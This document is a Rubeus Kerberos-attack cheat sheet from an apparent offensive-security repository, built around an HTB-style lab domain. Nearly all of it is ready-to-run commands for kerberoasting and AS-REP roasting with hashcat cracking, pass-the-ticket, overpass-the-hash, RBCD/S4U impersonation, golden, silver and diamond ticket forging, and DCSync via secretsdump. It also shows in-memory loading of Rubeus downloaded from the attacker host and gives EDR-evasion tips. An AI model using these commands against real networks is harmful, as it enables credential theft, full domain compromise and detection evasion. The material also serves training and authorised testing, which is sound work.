daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

rubeus.md (22377B)


      1 ---
      2 title: "Rubeus"
      3 description: "Rubeus Kerberos abuse: kerberoast, asreproast, ticket forging, S4U, pass-the-ticket, overpass-the-hash."
      4 category: active-directory
      5 subcategory: "Tooling & Recon"
      6 tags: [active-directory, kerberos, tickets]
      7 tools: [Rubeus]
      8 difficulty: advanced
      9 updated: "2026-08-09"
     10 source: "vault:ActiveDirectory/Rubeus.md"
     11 ---
     12 
     13 # Rubeus
     14 
     15 Rubeus is a C# toolset for raw Kerberos interaction and abuse. It talks directly to the Windows Kerberos API and the KDC — it doesn't need admin rights for most operations and doesn't touch LSASS directly (unlike Mimikatz), making it stealthier.
     16 
     17 **Core capabilities:**
     18 - Request, harvest, inject, and forge Kerberos tickets
     19 - Kerberoasting, AS-REP Roasting
     20 - Pass-the-Ticket, Overpass-the-Hash
     21 - S4U2Self/S4U2Proxy (RBCD/Delegation abuse)
     22 - Golden/Silver/Diamond ticket creation (needs hashes)
     23 
     24 ## Getting Rubeus onto a Target
     25 
     26 ```powershell
     27 # From your attacking machine — host it over HTTP
     28 python3 -m http.server 80
     29 
     30 # On target — download it
     31 certutil -urlcache -f http://10.10.14.x/Rubeus.exe Rubeus.exe
     32 iwr -uri http://10.10.14.x/Rubeus.exe -outfile Rubeus.exe
     33 
     34 # If you have a shell via Evil-WinRM
     35 upload Rubeus.exe
     36 
     37 # Run in memory (avoids dropping to disk) — load .NET assembly
     38 $data = (New-Object Net.WebClient).DownloadData('http://10.10.14.x/Rubeus.exe')
     39 $assem = [System.Reflection.Assembly]::Load($data)
     40 [Rubeus.Program]::Main("kerberoast".Split())
     41 ```
     42 
     43 ## Enumeration
     44 
     45 ```powershell
     46 # List all Kerberos tickets in current session
     47 .\Rubeus.exe klist
     48 
     49 # List tickets for ALL users (needs admin)
     50 .\Rubeus.exe klist /all
     51 
     52 # Dump all tickets from all sessions (admin required — touches LSASS)
     53 .\Rubeus.exe dump
     54 
     55 # Dump tickets for a specific service
     56 .\Rubeus.exe dump /service:krbtgt
     57 
     58 # Dump tickets from a specific LUID (logon session ID)
     59 .\Rubeus.exe dump /luid:0x3e7
     60 
     61 # Show Kerberos settings / current user info
     62 .\Rubeus.exe currentluid
     63 ```
     64 
     65 ## Harvesting Tickets
     66 
     67 Harvest monitors for new 4768 (TGT request) events and captures tickets as users log in — useful for persistence during an engagement.
     68 
     69 ```powershell
     70 # Monitor and harvest TGTs from all new logons (admin required)
     71 # Captures every TGT as it's issued — waits 30s between checks
     72 .\Rubeus.exe harvest /interval:30
     73 
     74 # Save harvested tickets to a directory
     75 .\Rubeus.exe harvest /interval:30 /outdir:C:\tickets\
     76 
     77 # Harvest and immediately inject the first ticket found
     78 .\Rubeus.exe harvest /interval:30 /nowrap
     79 ```
     80 
     81 ## Kerberoasting
     82 
     83 Request TGS tickets for accounts with SPNs set — the ticket is encrypted with the service account's password hash, which you then crack offline.
     84 
     85 ```powershell
     86 # Roast ALL accounts with SPNs
     87 .\Rubeus.exe kerberoast
     88 
     89 # Output to a file for hashcat/john
     90 .\Rubeus.exe kerberoast /outfile:hashes.txt
     91 
     92 # Only roast AES-capable accounts (more realistic, harder to crack)
     93 .\Rubeus.exe kerberoast /aes
     94 
     95 # Roast a specific user
     96 .\Rubeus.exe kerberoast /user:svc_sql
     97 
     98 # Roast with a specific TGT (if you have one)
     99 .\Rubeus.exe kerberoast /ticket:doIFuD...base64...
    100 
    101 # Roast using credentials (useful if you're on Linux or need to specify DC)
    102 # -- Run from a domain-joined machine or with /domain /dc flags --
    103 .\Rubeus.exe kerberoast /creduser:DOMAIN\user /credpassword:Password123
    104 
    105 # Force RC4 downgrade via TGT delegation trick (weaker, easier to crack)
    106 .\Rubeus.exe kerberoast /tgtdeleg
    107 
    108 # Nowrap — don't wrap long base64 output (easier to copy/paste)
    109 .\Rubeus.exe kerberoast /outfile:hashes.txt /nowrap
    110 ```
    111 
    112 **Crack with hashcat:**
    113 ```bash
    114 # Kerberoast (RC4) hashes are mode 13100
    115 hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt
    116 hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule
    117 
    118 # AES-256 tickets use mode 19700, AES-128 use 19600
    119 hashcat -m 19700 hashes.txt /usr/share/wordlists/rockyou.txt
    120 ```
    121 
    122 ## AS-REP Roasting
    123 
    124 Targets accounts with "Do not require Kerberos preauthentication" — you can request an AS-REP without knowing the password, and the response contains an encrypted blob crackable offline.
    125 
    126 ```powershell
    127 # Roast all users without preauth set (needs valid domain user creds to query LDAP)
    128 .\Rubeus.exe asreproast
    129 
    130 # Save output for cracking
    131 .\Rubeus.exe asreproast /outfile:asrep_hashes.txt
    132 
    133 # Target a specific user
    134 .\Rubeus.exe asreproast /user:jsmith
    135 
    136 # Force RC4 (easier to crack)
    137 .\Rubeus.exe asreproast /rc4opsec
    138 
    139 # Nowrap for easy copy
    140 .\Rubeus.exe asreproast /outfile:asrep_hashes.txt /nowrap
    141 
    142 # From Linux with Impacket (no creds needed if you know usernames)
    143 GetNPUsers.py DOMAIN/ -usersfile users.txt -dc-ip 10.10.11.x -outputfile asrep.txt
    144 ```
    145 
    146 **Crack with hashcat:**
    147 ```bash
    148 # AS-REP hashes are mode 18200
    149 hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt
    150 ```
    151 
    152 ## Requesting TGTs (asktgt)
    153 
    154 Ask the KDC directly for a TGT using credentials or hashes.
    155 
    156 ```powershell
    157 # Request TGT with plaintext password
    158 .\Rubeus.exe asktgt /user:administrator /password:Password123 /domain:PAINTERS.HTB /dc:dc.painters.htb
    159 
    160 # Request TGT using NTLM hash (RC4 encryption)
    161 .\Rubeus.exe asktgt /user:administrator /rc4:NTLM_HASH_HERE /domain:PAINTERS.HTB /ptt
    162 
    163 # Request TGT using AES256 key (stealthier — preferred)
    164 .\Rubeus.exe asktgt /user:administrator /aes256:AES_KEY_HERE /domain:PAINTERS.HTB /ptt
    165 
    166 # Request TGT and save as .kirbi file (portable ticket format)
    167 .\Rubeus.exe asktgt /user:svc_sql /rc4:HASH /domain:PAINTERS.HTB /outfile:svc_sql.kirbi
    168 
    169 # Request TGT and get base64 blob (easy to copy)
    170 .\Rubeus.exe asktgt /user:svc_sql /rc4:HASH /domain:PAINTERS.HTB /nowrap
    171 
    172 # Request TGT and immediately inject (/ptt = pass the ticket)
    173 .\Rubeus.exe asktgt /user:administrator /rc4:HASH /domain:PAINTERS.HTB /dc:dc.painters.htb /ptt
    174 ```
    175 
    176 ## Pass-the-Ticket (PTT)
    177 
    178 Take an existing ticket (base64 blob or .kirbi file) and inject it into your current session.
    179 
    180 ```powershell
    181 # Inject from base64 blob (paste the whole base64 string)
    182 .\Rubeus.exe ptt /ticket:doIFuDCCBbSgAwIBBaED...
    183 
    184 # Inject from .kirbi file
    185 .\Rubeus.exe ptt /ticket:administrator.kirbi
    186 
    187 # Verify it worked
    188 .\Rubeus.exe klist
    189 klist  # built-in Windows command
    190 
    191 # Purge all current Kerberos tickets (clean slate)
    192 .\Rubeus.exe purge
    193 
    194 # Purge tickets from a specific LUID
    195 .\Rubeus.exe purge /luid:0x5e73f
    196 
    197 # After PTT — test access
    198 dir \\dc.painters.htb\c$
    199 net use \\dc.painters.htb\c$
    200 ```
    201 
    202 **Workflow with a TGT blob:**
    203 ```powershell
    204 # 1. Inject the TGT
    205 .\Rubeus.exe ptt /ticket:doIFuDCCBbSgAwIBBaEDAgEWooIEujCCBLZhgg...
    206 
    207 # 2. Ask for a CIFS service ticket (for file shares / PsExec)
    208 .\Rubeus.exe asktgs /ticket:doIFuD... /service:cifs/dc.painters.htb /ptt
    209 
    210 # 3. Ask for LDAP ticket (for DCSync)
    211 .\Rubeus.exe asktgs /ticket:doIFuD... /service:ldap/dc.painters.htb /ptt
    212 
    213 # 4. Ask for HTTP ticket (for WinRM)
    214 .\Rubeus.exe asktgs /ticket:doIFuD... /service:http/dc.painters.htb /ptt
    215 
    216 # 5. Ask for HOST ticket (for PsExec / remote task scheduling)
    217 .\Rubeus.exe asktgs /ticket:doIFuD... /service:host/dc.painters.htb /ptt
    218 ```
    219 
    220 ## Overpass-the-Hash (OPtH)
    221 
    222 Convert an NTLM hash into a valid Kerberos TGT — lets you do Kerberos auth instead of NTLM, bypassing NTLM restrictions.
    223 
    224 ```powershell
    225 # Classic OPtH — inject TGT derived from NTLM hash
    226 .\Rubeus.exe asktgt /user:administrator /rc4:NTLM_HASH /domain:PAINTERS.HTB /ptt
    227 
    228 # Spawn a new process with the ticket injected (doesn't affect current session)
    229 .\Rubeus.exe asktgt /user:administrator /rc4:HASH /domain:PAINTERS.HTB /createnetonly:C:\Windows\System32\cmd.exe
    230 
    231 # Use AES256 for OPSEC (no RC4 downgrade logged)
    232 .\Rubeus.exe asktgt /user:administrator /aes256:AES_KEY /domain:PAINTERS.HTB /opsec /ptt
    233 ```
    234 
    235 ## Pass-the-Hash with Rubeus
    236 
    237 Rubeus doesn't do traditional PTH (that's Mimikatz territory) but you can chain it:
    238 
    239 ```powershell
    240 # Step 1: Use the NTLM hash to get a TGT (Overpass-the-Hash)
    241 .\Rubeus.exe asktgt /user:administrator /rc4:NTLM_HASH /domain:PAINTERS.HTB /nowrap
    242 
    243 # Step 2: Inject that TGT
    244 .\Rubeus.exe ptt /ticket:<base64_from_above>
    245 
    246 # Step 3: Now use any tool — Kerberos will auth transparently
    247 dir \\dc.painters.htb\c$
    248 ```
    249 
    250 For pure PTH (SMB, not Kerberos) — use Impacket from Linux instead:
    251 ```bash
    252 # Impacket PTH — no ticket needed
    253 psexec.py PAINTERS/Administrator@10.10.11.x -hashes :NTLM_HASH
    254 wmiexec.py PAINTERS/Administrator@10.10.11.x -hashes :NTLM_HASH
    255 smbexec.py PAINTERS/Administrator@10.10.11.x -hashes :NTLM_HASH
    256 ```
    257 
    258 ## Using Tickets with Evil-WinRM
    259 
    260 Evil-WinRM supports Kerberos auth but it's easier from Linux using a `.ccache` file.
    261 
    262 ### Method 1: From Linux with ccache (recommended)
    263 
    264 ```bash
    265 # Step 1: Get a TGT from Linux using Impacket (outputs .ccache)
    266 getTGT.py PAINTERS.HTB/administrator -hashes :NTLM_HASH
    267 getTGT.py PAINTERS.HTB/administrator -dc-ip 10.10.11.x
    268 
    269 # OR convert a .kirbi (Windows format) to .ccache (Linux format)
    270 ticketConverter.py admin.kirbi admin.ccache
    271 
    272 # Step 2: Export the ccache as the KRB5CCNAME env variable
    273 export KRB5CCNAME=/path/to/admin.ccache
    274 
    275 # Step 3: Add domain to /etc/hosts
    276 echo "10.10.11.x dc.painters.htb painters.htb" >> /etc/hosts
    277 
    278 # Step 4: Connect with Evil-WinRM using Kerberos auth (use FQDN, not IP)
    279 evil-winrm -i dc.painters.htb -r PAINTERS.HTB
    280 
    281 # Step 5: Verify who you are
    282 whoami
    283 klist
    284 ```
    285 
    286 ### Method 2: Dump from Windows, convert on Kali
    287 
    288 ```powershell
    289 # Dump the ticket from Windows to a file
    290 .\Rubeus.exe dump /service:http /nowrap
    291 # Copy the base64 output
    292 ```
    293 
    294 ```bash
    295 # Then on Kali: decode and convert
    296 echo "doIFuD...base64..." | base64 -d > admin.kirbi
    297 ticketConverter.py admin.kirbi admin.ccache
    298 export KRB5CCNAME=admin.ccache
    299 evil-winrm -i dc.painters.htb -r PAINTERS.HTB
    300 ```
    301 
    302 ### Evil-WinRM Kerberos config on Kali
    303 
    304 ```bash
    305 # One-liner to generate /etc/krb5.conf (realm must be UPPERCASE)
    306 cat > /etc/krb5.conf << EOF
    307 [libdefaults]
    308     default_realm = PAINTERS.HTB
    309     dns_lookup_realm = false
    310     dns_lookup_kdc = false
    311 [realms]
    312     PAINTERS.HTB = {
    313         kdc = dc.painters.htb
    314         admin_server = dc.painters.htb
    315     }
    316 [domain_realm]
    317     .painters.htb = PAINTERS.HTB
    318     painters.htb = PAINTERS.HTB
    319 EOF
    320 ```
    321 
    322 ## Using Tickets with PsExec
    323 
    324 PsExec uses SMB (CIFS + IPC$) — you need a CIFS service ticket.
    325 
    326 ### From Windows (Rubeus PTT → PsExec)
    327 
    328 ```powershell
    329 # Step 1: Inject TGT
    330 .\Rubeus.exe ptt /ticket:doIFuD...
    331 
    332 # Step 2: Request CIFS ticket (or it auto-derives from TGT)
    333 .\Rubeus.exe asktgs /ticket:doIFuD... /service:cifs/dc.painters.htb /ptt
    334 
    335 # Step 3: Run PsExec
    336 .\PsExec.exe \\dc.painters.htb cmd.exe
    337 .\PsExec.exe \\dc.painters.htb -s cmd.exe   # -s = SYSTEM context
    338 
    339 # Verify in the new session
    340 whoami
    341 hostname
    342 ```
    343 
    344 ### Using Impacket psexec from Linux (more reliable)
    345 
    346 ```bash
    347 # With NTLM hash directly (PTH)
    348 psexec.py PAINTERS/Administrator@10.10.11.x -hashes :NTLM_HASH
    349 
    350 # With Kerberos ticket (ccache)
    351 export KRB5CCNAME=admin.ccache
    352 psexec.py -k -no-pass PAINTERS/Administrator@dc.painters.htb
    353 
    354 # With password
    355 psexec.py PAINTERS/Administrator:Password123@10.10.11.x
    356 
    357 # Other Impacket exec tools (use same syntax)
    358 wmiexec.py  -k -no-pass PAINTERS/Administrator@dc.painters.htb          # WMI — no service created
    359 smbexec.py  -k -no-pass PAINTERS/Administrator@dc.painters.htb          # SMB — stealthier than psexec
    360 atexec.py   -k -no-pass PAINTERS/Administrator@dc.painters.htb "whoami" # Task scheduler
    361 ```
    362 
    363 ## Using Tickets with Impacket Tools
    364 
    365 ### Ticket Conversion (kirbi ↔ ccache)
    366 
    367 ```bash
    368 # Rubeus gives you base64 (.kirbi format internally); Impacket uses .ccache
    369 echo "doIFuDCCBbSgAwIBBaED..." | base64 -d > ticket.kirbi
    370 ticketConverter.py ticket.kirbi ticket.ccache
    371 export KRB5CCNAME=/path/to/ticket.ccache
    372 ```
    373 
    374 ### DCSync with secretsdump.py
    375 
    376 ```bash
    377 export KRB5CCNAME=admin.ccache
    378 secretsdump.py -k -no-pass PAINTERS/Administrator@dc.painters.htb
    379 
    380 # Dump just NTLM hashes
    381 secretsdump.py -k -no-pass -just-dc-ntlm PAINTERS/Administrator@dc.painters.htb
    382 
    383 # Dump specific user
    384 secretsdump.py -k -no-pass -just-dc-user krbtgt PAINTERS/Administrator@dc.painters.htb
    385 ```
    386 
    387 ### Full Impacket Kerberos Tool Reference
    388 
    389 ```bash
    390 # Get TGT (outputs .ccache automatically)
    391 getTGT.py PAINTERS.HTB/user:password
    392 getTGT.py PAINTERS.HTB/user -hashes :NTLM_HASH
    393 export KRB5CCNAME=user.ccache
    394 
    395 # Get TGS for specific service
    396 getST.py -spn cifs/dc.painters.htb PAINTERS.HTB/user:password
    397 getST.py -spn cifs/dc.painters.htb -hashes :HASH PAINTERS.HTB/user
    398 
    399 # S4U impersonation (RBCD — see S4U section)
    400 getST.py -spn cifs/dc.painters.htb -impersonate Administrator \
    401   -dc-ip 10.10.11.x PAINTERS.HTB/FAKE-COMP01$:Password123
    402 
    403 # Kerberoast from Linux
    404 GetUserSPNs.py PAINTERS.HTB/user:password -dc-ip 10.10.11.x -request
    405 GetUserSPNs.py PAINTERS.HTB/user:password -dc-ip 10.10.11.x -request -outputfile kerberoast.txt
    406 
    407 # AS-REP roast from Linux
    408 GetNPUsers.py PAINTERS.HTB/ -usersfile users.txt -dc-ip 10.10.11.x -no-pass -outputfile asrep.txt
    409 GetNPUsers.py PAINTERS.HTB/user:password -dc-ip 10.10.11.x -request  # authenticated
    410 ```
    411 
    412 > **Note —** Modern Impacket installs (pip/apt) also expose these as `impacket-getTGT`, `impacket-secretsdump`, etc. The `.py` example names still work when installed from source or when the examples are on PATH.
    413 
    414 ## S4U Attacks (RBCD / Constrained Delegation)
    415 
    416 ### S4U2Self + S4U2Proxy (Resource-Based Constrained Delegation)
    417 
    418 The chain: you own a machine account → configure RBCD → impersonate any user for any service on the target.
    419 
    420 **Full attack chain:**
    421 ```powershell
    422 # Prerequisites:
    423 # 1. You have GenericWrite/GenericAll on a computer object (or can create machine accounts)
    424 # 2. MachineAccountQuota > 0 (default is 10)
    425 
    426 # Step 1: Create a fake computer account (Powermad)
    427 Import-Module Powermad.ps1
    428 New-MachineAccount -MachineAccount NETRUNNER-PC -Password $(ConvertTo-SecureString 'Passw0rd!' -AsPlainText -Force)
    429 
    430 # Step 2: Get the NTLM hash of the fake computer's password
    431 .\Rubeus.exe hash /password:Passw0rd! /user:NETRUNNER-PC$ /domain:PAINTERS.HTB
    432 # Note the rc4_hmac value
    433 
    434 # Step 3: Set RBCD on target — allow our fake PC to delegate
    435 Set-ADComputer -Identity "DC" -PrincipalsAllowedToDelegateToAccount "NETRUNNER-PC$"
    436 # Or using PowerView:
    437 $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-...NETRUNNER-PC$-SID)"
    438 $SDBytes = New-Object byte[] ($SD.BinaryLength)
    439 $SD.GetBinaryForm($SDBytes, 0)
    440 Set-DomainObject -Identity DC -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
    441 
    442 # Step 4: S4U attack — impersonate Administrator for CIFS on DC
    443 .\Rubeus.exe s4u /user:NETRUNNER-PC$ /rc4:NTLM_HASH_OF_PC \
    444   /impersonateuser:Administrator \
    445   /msdsspn:cifs/dc.painters.htb \
    446   /domain:PAINTERS.HTB \
    447   /dc:dc.painters.htb \
    448   /ptt
    449 
    450 # Step 5: Use access
    451 dir \\dc.painters.htb\c$
    452 .\PsExec.exe \\dc.painters.htb cmd.exe
    453 
    454 # For different services — change /msdsspn:
    455 /msdsspn:ldap/dc.painters.htb    # DCSync
    456 /msdsspn:http/dc.painters.htb    # WinRM
    457 /msdsspn:host/dc.painters.htb    # Task scheduler / WMI
    458 ```
    459 
    460 **RBCD from Linux (Impacket):**
    461 ```bash
    462 # Set RBCD attribute
    463 rbcd.py -f NETRUNNER-PC -t DC -dc-ip 10.10.11.x 'PAINTERS.HTB/user:password'
    464 
    465 # S4U attack
    466 getST.py -spn cifs/dc.painters.htb -impersonate Administrator \
    467   -dc-ip 10.10.11.x 'PAINTERS.HTB/NETRUNNER-PC$:Passw0rd!'
    468 
    469 export KRB5CCNAME=Administrator.ccache
    470 secretsdump.py -k -no-pass PAINTERS/Administrator@dc.painters.htb
    471 ```
    472 
    473 ## Golden Tickets
    474 
    475 Forge a TGT using the **krbtgt** hash. Valid for 10 years by default. Works even if the real user's password changes.
    476 
    477 ```powershell
    478 # Prerequisites: krbtgt NTLM hash + Domain SID
    479 
    480 # Step 1: Get domain SID (all but the last -XXXX of your own SID)
    481 whoami /user
    482 
    483 # Step 2: Craft golden ticket (AES256 preferred)
    484 .\Rubeus.exe golden /aes256:KRBTGT_AES256_KEY \
    485   /user:Administrator \
    486   /domain:PAINTERS.HTB \
    487   /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX \
    488   /ptt
    489 
    490 # With RC4 (NTLM hash of krbtgt)
    491 .\Rubeus.exe golden /rc4:KRBTGT_NTLM_HASH \
    492   /user:FakeUser \
    493   /domain:PAINTERS.HTB \
    494   /sid:S-1-5-21-... \
    495   /ptt
    496 
    497 # Save to file instead of injecting
    498 .\Rubeus.exe golden /rc4:HASH /user:Administrator /domain:PAINTERS.HTB \
    499   /sid:S-1-5-21-... /outfile:golden.kirbi
    500 
    501 # Verify
    502 klist
    503 dir \\dc.painters.htb\c$
    504 ```
    505 
    506 **From Linux (Impacket):**
    507 ```bash
    508 # ticketer.py creates .ccache golden tickets
    509 ticketer.py -nthash KRBTGT_NTLM -domain-sid S-1-5-21-... \
    510   -domain PAINTERS.HTB Administrator
    511 
    512 export KRB5CCNAME=Administrator.ccache
    513 psexec.py -k -no-pass PAINTERS/Administrator@dc.painters.htb
    514 ```
    515 
    516 ## Silver Tickets
    517 
    518 Forge a TGS for a **specific service** using the **service account's** NTLM hash. More targeted and stealthier than golden (doesn't contact KDC).
    519 
    520 ```powershell
    521 # Forge a CIFS ticket (file shares, PsExec) using machine account hash
    522 .\Rubeus.exe silver /rc4:MACHINE_ACCOUNT_NTLM \
    523   /user:Administrator \
    524   /service:cifs/dc.painters.htb \
    525   /domain:PAINTERS.HTB \
    526   /sid:S-1-5-21-... \
    527   /ptt
    528 
    529 # Forge HTTP ticket (WinRM)
    530 .\Rubeus.exe silver /rc4:HASH /user:Administrator \
    531   /service:http/dc.painters.htb \
    532   /domain:PAINTERS.HTB /sid:S-1-5-21-... /ptt
    533 
    534 # Forge LDAP ticket (DCSync)
    535 .\Rubeus.exe silver /rc4:HASH /user:Administrator \
    536   /service:ldap/dc.painters.htb \
    537   /domain:PAINTERS.HTB /sid:S-1-5-21-... /ptt
    538 
    539 # Forge MSSQLSvc ticket (SQL Server)
    540 .\Rubeus.exe silver /rc4:HASH /user:Administrator \
    541   /service:MSSQLSvc/sql.painters.htb:1433 \
    542   /domain:PAINTERS.HTB /sid:S-1-5-21-... /ptt
    543 ```
    544 
    545 **Common service names for SPNs:**
    546 
    547 | Service | SPN Prefix | Use Case |
    548 |---------|-----------|----------|
    549 | SMB/File | `cifs/` | File access, PsExec |
    550 | WinRM | `http/` | Evil-WinRM, PS Remoting |
    551 | LDAP | `ldap/` | DCSync, LDAP queries |
    552 | WMI | `host/` | WMI execution |
    553 | SQL Server | `MSSQLSvc/` | SQL auth |
    554 | RDP | `TERMSRV/` | RDP access |
    555 | Kerberos (golden) | `krbtgt/` | Get any ticket |
    556 
    557 ## Diamond Tickets
    558 
    559 Newer technique — modifies a real TGT rather than forging from scratch. Much harder for EDR to detect since the PAC is signed by the real KDC.
    560 
    561 ```powershell
    562 # Requires: krbtgt hash + user creds
    563 .\Rubeus.exe diamond /tgtdeleg \
    564   /ticketuser:Administrator \
    565   /ticketuserid:500 \
    566   /groups:519 \
    567   /krbkey:KRBTGT_AES256 \
    568   /domain:PAINTERS.HTB \
    569   /dc:dc.painters.htb \
    570   /ptt
    571 ```
    572 
    573 ## Ticket Renewal & Manipulation
    574 
    575 ```powershell
    576 # Renew a TGT before it expires
    577 .\Rubeus.exe renew /ticket:doIFuD...
    578 .\Rubeus.exe renew /ticket:admin.kirbi /ptt
    579 
    580 # Auto-renew every 30 minutes
    581 .\Rubeus.exe renew /ticket:doIFuD... /autorenew
    582 
    583 # Describe a ticket (show its contents without cracking)
    584 .\Rubeus.exe describe /ticket:doIFuD...
    585 
    586 # Triage — show all tickets across all logon sessions (admin)
    587 .\Rubeus.exe triage
    588 
    589 # Convert kirbi to base64 and back
    590 .\Rubeus.exe decode /ticket:doIFuD...
    591 ```
    592 
    593 ## Roasting from Linux (Impacket alternatives)
    594 
    595 When you're attacking from Kali and don't have a foothold yet (or don't want to drop Rubeus):
    596 
    597 ```bash
    598 # Kerberoast — needs valid credentials
    599 GetUserSPNs.py PAINTERS.HTB/user:password -dc-ip 10.10.11.x -request
    600 GetUserSPNs.py PAINTERS.HTB/user -hashes :NTLM -dc-ip 10.10.11.x -request -outputfile kerb.txt
    601 
    602 # AS-REP roast — needs username list
    603 GetNPUsers.py PAINTERS.HTB/ -usersfile users.txt -dc-ip 10.10.11.x -no-pass
    604 GetNPUsers.py PAINTERS.HTB/user:password -dc-ip 10.10.11.x -request -outputfile asrep.txt
    605 
    606 # Crack
    607 hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt   # Kerberoast
    608 hashcat -m 18200 asrep.txt /usr/share/wordlists/rockyou.txt  # AS-REP
    609 ```
    610 
    611 ## OPSEC Tips
    612 
    613 - Use AES256 keys instead of RC4/NTLM — RC4 is flagged by modern EDR (`/aes256:KEY` instead of `/rc4:HASH`).
    614 - Use the `/opsec` flag where available — Rubeus applies stealth measures.
    615 - Use `/createnetonly` to spawn a hidden process with the ticket rather than injecting into your current session (avoids overwriting existing tickets).
    616 - Request tickets from non-DC machines — S4U from a workstation is less suspicious than from the attacker machine directly.
    617 - Use `/enctype:aes256` when requesting service tickets.
    618 - Avoid `/dump` on modern environments — it touches LSASS and will trigger AV. Use `/dump /luid:SPECIFIC_LUID` instead of dumping everything.
    619 - Diamond tickets > Golden tickets for stealth (EDR-evasive).
    620 - Clean up: `.\Rubeus.exe purge` after you're done.
    621 
    622 ## Common Errors & Fixes
    623 
    624 | Error | Cause | Fix |
    625 |-------|-------|-----|
    626 | `KDC_ERR_PREAUTH_FAILED` | Wrong password/hash | Verify credentials/hash |
    627 | `KDC_ERR_C_PRINCIPAL_UNKNOWN` | User doesn't exist | Check username spelling |
    628 | `KDC_ERR_S_PRINCIPAL_UNKNOWN` | SPN doesn't exist | Verify SPN with `setspn -L user` |
    629 | `KRB_AP_ERR_SKEW` | Clock skew > 5 min | `net time \\dc /set /yes` or `ntpdate dc.domain.htb` (or `faketime` on Linux) |
    630 | `KRB_AP_ERR_TKT_EXPIRED` | Ticket too old | Request a new TGT |
    631 | `ERROR_ACCESS_DENIED` on PsExec | No admin rights or wrong service ticket | Verify ticket SPN and user group membership |
    632 | Kerberos errors in Evil-WinRM | `/etc/krb5.conf` wrong | Check realm name is UPPERCASE, DNS resolves |
    633 | `No credentials cache found` | KRB5CCNAME not set | `export KRB5CCNAME=/path/to/ticket.ccache` |
    634 | `KRB_AP_ERR_MODIFIED` | Wrong service account hash for silver ticket | Re-extract the correct machine/service account hash |
    635 
    636 ## Quick Reference Card
    637 
    638 ```text
    639 HARVEST TICKETS:    Rubeus.exe harvest /interval:30
    640 GET TGT:            Rubeus.exe asktgt /user:X /rc4:HASH /domain:D /ptt
    641 INJECT TICKET:      Rubeus.exe ptt /ticket:BASE64_OR_KIRBI
    642 REQUEST TGS:        Rubeus.exe asktgs /ticket:TGT /service:cifs/HOST /ptt
    643 KERBEROAST:         Rubeus.exe kerberoast /outfile:hashes.txt /nowrap
    644 AS-REP ROAST:       Rubeus.exe asreproast /outfile:hashes.txt /nowrap
    645 LIST TICKETS:       Rubeus.exe klist | klist
    646 DUMP TICKETS:       Rubeus.exe dump /nowrap
    647 DESCRIBE TICKET:    Rubeus.exe describe /ticket:BASE64
    648 S4U ATTACK:         Rubeus.exe s4u /user:PC$ /rc4:HASH /impersonateuser:Admin /msdsspn:cifs/HOST /ptt
    649 GOLDEN TICKET:      Rubeus.exe golden /rc4:KRBTGT_HASH /user:Admin /domain:D /sid:S-1-5-21-... /ptt
    650 SILVER TICKET:      Rubeus.exe silver /rc4:SVC_HASH /user:Admin /service:cifs/HOST /domain:D /sid:S /ptt
    651 PURGE TICKETS:      Rubeus.exe purge
    652 
    653 LINUX EVIL-WINRM:   export KRB5CCNAME=ticket.ccache && evil-winrm -i HOST -r REALM
    654 LINUX PSEXEC:       export KRB5CCNAME=ticket.ccache && psexec.py -k -no-pass DOMAIN/user@HOST
    655 LINUX DCSYNC:       export KRB5CCNAME=ticket.ccache && secretsdump.py -k -no-pass DOMAIN/user@HOST
    656 CONVERT TICKET:     ticketConverter.py ticket.kirbi ticket.ccache
    657 ```
    658 
    659 For use in authorised engagements only.